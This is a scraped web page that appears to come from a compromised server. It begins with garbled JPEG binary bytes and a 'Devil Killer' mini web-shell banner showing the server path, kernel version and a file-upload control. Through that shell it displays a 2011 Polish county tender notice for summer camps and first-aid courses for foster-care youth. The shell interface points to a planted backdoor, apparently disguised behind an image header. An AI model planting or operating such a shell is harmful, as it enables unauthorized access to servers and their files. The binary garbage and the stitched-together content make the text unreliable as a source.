JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110526/149221-N-2011.html

<p class="kh_header"><b>Końskie: Postępowanie o udzielenie zamówienia publicznego
na
Część 1
Zorganizowanie 10-dniowego motywacyjno-wzmacniającego Obozu Aktywnej Integracji dla wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 15-18 lat, połączonego z kursem udzielania pierwszej pomocy  
Część 2
Zorganizowanie 5-dniowego Obozu Aktywnej Integracji połączonego z warsztatami rozwoju własnego oraz kursem  udzielania pierwszej pomocy dla usamodzielnianych wychowanków rodzin zastępczych                 i placówek opiekuńczo - wychowawczych w wieku 18-25 lat</b><br>
<b>Numer ogłoszenia: 149221 - 2011; data zamieszczenia: 26.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Konecki , ul. Staszica 2, 26-200 Końskie, woj. świętokrzyskie, tel. 0-41 372 41 34, faks 0-41 372 83 20.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego
na
Część 1
Zorganizowanie 10-dniowego motywacyjno-wzmacniającego Obozu Aktywnej Integracji dla wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 15-18 lat, połączonego z kursem udzielania pierwszej pomocy  
Część 2
Zorganizowanie 5-dniowego Obozu Aktywnej Integracji połączonego z warsztatami rozwoju własnego oraz kursem  udzielania pierwszej pomocy dla usamodzielnianych wychowanków rodzin zastępczych                 i placówek opiekuńczo - wychowawczych w wieku 18-25 lat.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
	
1. Przedmiotem zamówienia jest usługa polegająca na:
Część 1 - zorganizowaniu dla 26 wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 15-18 lat, 10 - dniowego motywacyjno-wzmacniającego Obozu Aktywnej Integracji połączonego z kursem udzielania pierwszej pomocy. Obóz powinien odbyć się na terenie Polski - w miejscowości górskiej lub położonej nad zbiornikiem wodnym (morze, jezioro). W trakcie trwania obozu powinien zostać przeprowadzony kurs udzielania pierwszej pomocy przedmedycznej zakończony zdobyciem certyfikatu oraz warsztaty motywacyjno-wzmacniające w ilości 5 godzin zegarowych. W grupie uczestników obozu będą                   4 osoby niepełnosprawne o następujących schorzeniach: astma, upośledzenie umysłowe, niepełnosprawność z ogólnego stanu zdrowia.
Część 2 - zorganizowaniu dla 40 usamodzielnianych wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 18 - 25 lat                     5 - dniowego Obozu Aktywnej Integracji połączonego z warsztatami rozwoju własnego oraz zdobyciem certyfikatu udzielania pierwszej pomocy przedmedycznej, zakończony zdobyciem certyfikatu, Obóz powinien odbyć się na terenie Polski -                w miejscowości górskiej lub położonej nad zbiornikiem wodnym (morze, jezioro).                 W trakcie trwania obozu powinien zostać przeprowadzony kurs udzielania pierwszej pomocy przedmedycznej, zakończony zdobyciem certyfikatu, jak również warsztaty rozwoju własnego w ilości 5 godzin zegarowych. W grupie uczestników obozu będzie 1 osoba niepełnosprawna poruszająca się na wózku inwalidzkim.
2. Wymagany termin realizacji przedmiotu zamówienia: 
-	Część 1 - od 01.07.2011 r. do 31.08.2011 r.,
-	Część 2 - od 01.07.2011 r. do 30.09.2011 r.,
3. Wymagania kadrowe dotyczące organizacji obozów aktywnej integracji:
a) dotyczące Części 1 zamówienia:
-	w zakresie organizacji obozu - kierownik i 4 opiekunów/wychowawców posiadających kwalifikacje określone w Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 roku w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r., Nr 12, poz. 67 z póź. zm.) oraz posiadających doświadczenie w pracy z osobami niepełnosprawnymi, 
-	w zakresie organizacji warsztatów motywacyjno - wzmacniających - co najmniej               1 trener o wykształceniu wyższym (psycholog/pedagog/socjolog) z doświadczeniem         w prowadzeniu warsztatów  o przedmiotowej tematyce,
-	w zakresie opieki medycznej - całodobowa opieka pielęgniarska świadczona przez osoby posiadające odpowiednie kwalifikacje,
-	w zakresie kursu udzielania pierwszej pomocy - co najmniej 2 trenerów                               z uprawnieniami do prowadzenia kursów pierwszej pomocy przedmedycznej.


b) dotyczące Części 2 zamówienia:
-	w zakresie organizacji obozu - kierownik i 4 opiekunów/wychowawców posiadających kwalifikacje określone w Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 roku w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r., Nr 12, poz. 67 z póź. zm.) oraz                     1 opiekun dla uczestniczki poruszającej się na wózku inwalidzkim do całodobowej opieki, który obecny będzie także podczas transportu uczestników obozu,
-	w zakresie organizacji warsztatów rozwoju własnego - co najmniej 1 trener                          o wykształceniu wyższym (psycholog/pedagog/socjolog) z doświadczeniem                       w prowadzeniu warsztatów o przedmiotowej tematyce,
-	w zakresie kursu udzielania pierwszej pomocy - co najmniej 2 trenerów                               z uprawnieniami do prowadzenia kursów pierwszej pomocy przedmedycznej.
-	w zakresie opieki medycznej - całodobowa opieka pielęgniarska świadczona przez osoby posiadające odpowiednie kwalifikacje.
4 . Wymogi Zamawiającego dotyczące realizacji przedmiotu zamówienia: 
A. Część 1:
a) Wykonawca zapewni transport uczestników na obóz z Końskich do ośrodka i w drodze powrotnej - autokarem wyposażonym w wc. Zamawiający zastrzega sobie prawo do kontroli pojazdu przed rozpoczęciem podróży, przez odpowiednie służby kontroli. W razie wykazania przez organy kontroli niesprawności autokaru, Wykonawca jest zobowiązany w ciągu                           1 godziny do podstawienia pojazdu sprawnego/zastępczego. Transport uczestników obozu powinien odbywać się w ciągu dnia,
b) Wykonawca zapewni uczestnikom obozu wyżywienie 4 razy dziennie (śniadanie, obiad, podwieczorek i kolacja), jak również suchy prowiant na drogę powrotną oraz na wszystkie ewentualne całodniowe wycieczki zorganizowane w czasie trwania obozu (soki, kanapki, owoce, słodycze). Jadalnia (stołówka) powinna być usytuowana na terenie obiektu, w którym zorganizowany jest obóz, o powierzchni umożliwiającej jednoczesne spożywanie posiłku przez wszystkich uczestników obozu,
c) Uczestnicy obozu będą zakwaterowani w pokojach dwu- lub trzyosobowych,                         o podwyższonym standardzie, z pełnym węzłem sanitarnym, z TV kablową i czajnikiem bezprzewodowym, w budynku dostosowanym do potrzeb osób niepełnosprawnych. Wykluczone jest zakwaterowanie uczestników obozu w domkach kempingowych,
d) Czas trwania kursu pierwszej pomocy - 8 godzin zegarowych dla każdego                                         z 26 uczestników obozu, natomiast czas trwania warsztatów motywacyjno - wzmacniających - 5 godzin zegarowych.
e) Miejsce warsztatów i kursu pierwszej pomocy - na terenie ośrodka, w którym będzie się odbywał obóz. Sala przeznaczona do prowadzenia warsztatów i kursu powinna być przystosowana do prowadzenia zajęć i mieć powierzchnię umożliwiającą aktywny udział uczestników w zajęciach,
f) Wykonawca zapewni uczestnikom obozu zajęcia integracyjne o charakterze kulturalno-rozrywkowym (wycieczkę autokarową z przewodnikiem, dyskoteki, ognisko, rozgrywki sportowe z nagrodami itp.). W przypadku organizacji wycieczki - Wykonawca zapewni nieodpłatny dla uczestników wstęp do zwiedzania obiektów,
g) Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo uczestników obozu, od momentu wyjazdu do czasu odbioru wszystkich osób z miejsca zbiórki po powrocie przez rodziców lub opiekunów prawnych,
h) Wykonawca zapewni warunki zgodnie z przepisami bezpieczeństwa i higieny pracy                    w trakcie obozu i kursu,
i) Wykonawca zapewni animatora dla uczestników obozu odpowiedzialnego za koordynację pobytu grupy na obozie, który przeprowadzi ewaluację realizacji zadania za pomocą ankiet ewaluacyjnych, zgodnie z przekazanym przez Zamawiającego wzorem,
j) Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone przez uczestników obozu,
k) W przypadku zorganizowania obozu w miejscowości uzdrowiskowej - Wykonawca poniesie koszty opłaty uzdrowiskowej/klimatycznej za wszystkich uczestników obozu,  
l) Wykonawca opłaci ubezpieczenie NNW dla każdego uczestnika obozu, obejmujące: dojazd uczestników obozu z miejscowości Końskie do miejsca odbywania się obozu, dojazd                z miejsca odbywania się obozu do miejscowości Końskie uczestników obozu oraz całodobowy 10 dniowy pobyt na obozie, na kwotę 10.000 zł. na jedną osobę,
ł) Wykonawca oznaczy miejsca, z których korzystać będą uczestnicy obozu poprzez umieszczenie informacji dotyczących projektu oraz współfinansowania przez Unię Europejską (przekazanych przez Zamawiającego),
m) Wykonawca będzie prowadził dokumentację przebiegu obozu, warsztatów oraz kursu pierwszej pomocy, tj.: dziennika zajęć i listy obecności oraz dokumentację fotograficzną,
n) Wykonawca po zakończonym kursie udzielania pierwszej pomocy przedmedycznej wyda jego uczestnikom stosowne certyfikaty, których kserokopie wraz z imienną listą, przekaże Zamawiającemu,
o) Zamawiający zastrzega sobie prawo kontroli w zakresie realizacji przedmiotu zamówienia.
B. Część 2:
a) Wykonawca zapewni transport uczestników na obóz z Końskich do ośrodka i w drodze powrotnej - pojazdem dostosowanym do przewozu osoby poruszającej się na wózku inwalidzkim. Pojazd powinien być wyposażony w WC. Zamawiający zastrzega sobie prawo do kontroli pojazdu przed rozpoczęciem podróży, przez odpowiednie służby kontroli. W razie wykazania przez organy kontroli niesprawności autokaru, Wykonawca jest zobowiązany              w ciągu 1 godziny do podstawienia pojazdu sprawnego/zastępczego. Transport uczestników obozu powinien odbywać się w ciągu dnia,
b) Wykonawca zapewni uczestnikom obozu wyżywienie 4 razy dziennie (śniadanie, obiad, podwieczorek i kolacja), jak również suchy prowiant na drogę powrotną oraz na wszystkie ewentualne całodniowe wycieczki zorganizowane w czasie trwania obozu (soki, kanapki, owoce, słodycze). Jadalnia (stołówka) powinna być usytuowana na terenie obiektu, w którym zorganizowany jest obóz, o powierzchni umożliwiającej jednoczesne spożywanie posiłku przez wszystkich uczestników obozu,
c) Uczestnicy obozu będą zakwaterowani w pokojach dwu- lub trzyosobowych,                         o podwyższonym standardzie, z pełnym węzłem sanitarnym, z TV kablową i czajnikiem bezprzewodowym, w budynku dostosowanym do potrzeb osób niepełnosprawnych. Wykluczone jest zakwaterowanie uczestników obozu w domkach kempingowych,
d) W przypadku niepełnosprawnej uczestniczki obozu, należy zakwaterować ją wraz                       z opiekunem w pokoju dwuosobowym z łazienką, dostosowanym do potrzeb osób poruszających się na wózkach inwalidzkich, 
e) Czas trwania kursu pierwszej pomocy - 8 godzin zegarowych dla każdego z 40 uczestników obozu, natomiast czas trwania warsztatów rozwoju własnego - 5 godzin zegarowych,
f) Miejsce warsztatów i kursu pierwszej pomocy - na terenie ośrodka, w którym będzie się odbywał obóz. Sala przeznaczona do prowadzenia warsztatów i kursu powinna być przystosowana do prowadzenia zajęć i mieć powierzchnię umożliwiającą aktywny udział uczestników w zajęciach,
g) Wykonawca zapewni uczestnikom obozu zajęcia integracyjne o charakterze kulturalno-rozrywkowym (wycieczkę autokarową z przewodnikiem, dyskoteki, ognisko, rozgrywki sportowe z nagrodami itp.). W przypadku organizacji wycieczki - Wykonawca zapewni nieodpłatny dla uczestników wstęp do zwiedzania obiektów,
h) Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo uczestników obozu, od momentu wyjazdu do czasu odbioru wszystkich osób z miejsca zbiórki po powrocie przez rodziców lub opiekunów prawnych,
i) Wykonawca zapewni warunki zgodnie z przepisami bezpieczeństwa i higieny pracy                    w trakcie obozu i kursu, 
j) Wykonawca zapewni animatora dla uczestników obozu odpowiedzialnego za koordynację pobytu grupy na obozie, który przeprowadzi ewaluację realizacji zadania za pomocą ankiet ewaluacyjnych, zgodnie z przekazanym przez Zamawiającego wzorem,
k) Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone przez uczestników obozu,
l) W przypadku zorganizowania obozu w miejscowości uzdrowiskowej - Wykonawca poniesie koszty opłaty uzdrowiskowej/klimatycznej za wszystkich uczestników obozu,  
ł) Wykonawca opłaci ubezpieczenie NNW dla każdego uczestnika obozu, obejmujące: dojazd uczestników obozu z miejscowości Końskie do miejsca odbywania się obozu, dojazd                z miejsca odbywania się obozu do miejscowości Końskie uczestników obozu oraz całodobowy 5 dniowy pobyt na obozie, na kwotę 10.000 zł na jedną osobę,
m) Wykonawca oznaczy miejsca, z których korzystać będą uczestnicy obozu poprzez umieszczenie informacji dotyczących projektu oraz współfinansowania przez Unię Europejską (przekazanych przez Zamawiającego),
n) Wykonawca będzie prowadził dokumentację przebiegu obozu, warsztatów oraz kursu pierwszej pomocy, tj.: dziennika zajęć i listy obecności oraz dokumentację fotograficzną,
o) Wykonawca po zakończonym kursie udzielania pierwszej pomocy przedmedycznej wyda jego uczestnikom stosowne certyfikaty, których kserokopie wraz z imienną listą, przekaże Zamawiającemu,
p) Zamawiający zastrzega sobie prawo kontroli w zakresie realizacji przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 55.24.00.00-4, 63.50.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że posiada uprawnienia do  prowadzenia działalności w oparciu o ustawę z dnia 29 sierpnia 1997 r. o usługach turystycznych                        (tj. Dz. U. z 2004 r. Nr 223 poz. 2268) tj. jest wpisany do rejestru organizatorów turystyki                                       i pośredników turystycznych, prowadzonego przez marszałka województwa właściwego ze względu na siedzibę Wykonawcy (przedsiębiorcy), a w przypadku Wykonawców (przedsiębiorców) zagranicznych                       w rozumieniu powyższej ustawy - wybranego przez niego marszałka województwa, z zastrzeżeniem,               iż w przypadku Wykonawcy (przedsiębiorcy)zagranicznego, który utworzył oddział na terytorium Rzeczypospolitej Polskiej zgodnie z przepisami ustawy z dnia 2 lipca 2004r o swobodzie działalności gospodarczej organem właściwym do prowadzenia rejestru jest marszałek województwa właściwy               ze względu na siedzibę oddziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) co najmniej dwie usługi, z których każda polegała na zorganizowaniu i przeprowadzeniu dla minimum 30 uczestników (dzieci lub młodzieży) kolonii i/lub obozu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował następującymi osobami: 
dotyczące Części 1 zamówienia:
-	w zakresie organizacji obozu - kierownikiem i 4 opiekunami/wychowawcami, posiadającymi kwalifikacje określone w Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 roku      w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej,           a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r., Nr 12, poz. 67 z póź. zm.)                          i doświadczenie w pracy z osobami niepełnosprawnymi, 
-	w zakresie organizacji warsztatów motywacyjno - wzmacniających - co najmniej 1 trenerem                       o wykształceniu wyższym (psycholog/pedagog_socjolog) z doświadczeniem w prowadzeniu warsztatów o przedmiotowej tematyce,
-	w zakresie opieki medycznej - co najmniej 2 pielęgniarki, z uprawnieniami do  zapewnienia całodobowej opieki medycznej,
-	w zakresie kursu udzielania pierwszej pomocy - co najmniej 2 trenerami z uprawnieniami do prowadzenia kursów pierwszej pomocy przedmedycznej.
dotyczące Części 2 zamówienia:
-	w zakresie organizacji obozu - kierownikiem i 4 opiekunami_wychowawcami posiadającymi wykształcenie wyższe pedagogiczne i 1 opiekunem dla uczestniczki poruszającej się na wózku inwalidzkim do całodobowej opieki, który obecny będzie także podczas transportu uczestników obozu,
-	w zakresie organizacji warsztatów rozwoju własnego - co najmniej 1 trenerem o wykształceniu wyższym (psycholog_pedagog_socjolog) z doświadczeniem w prowadzeniu warsztatów                                     o przedmiotowej tematyce,
-	w zakresie kursu udzielania pierwszej pomocy - co najmniej 2 trenerami z uprawnieniami do prowadzenia kursów pierwszej pomocy przedmedycznej.
-	w zakresie opieki medycznej - co najmniej 2 pielęgniarki, z uprawnieniami do  zapewnienia całodobowej opieki medycznej,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w za spełniony, jeżeli Wykonawca wykaże, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 40 000,00 zł (słownie: czterdzieści tysięcy złotych),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
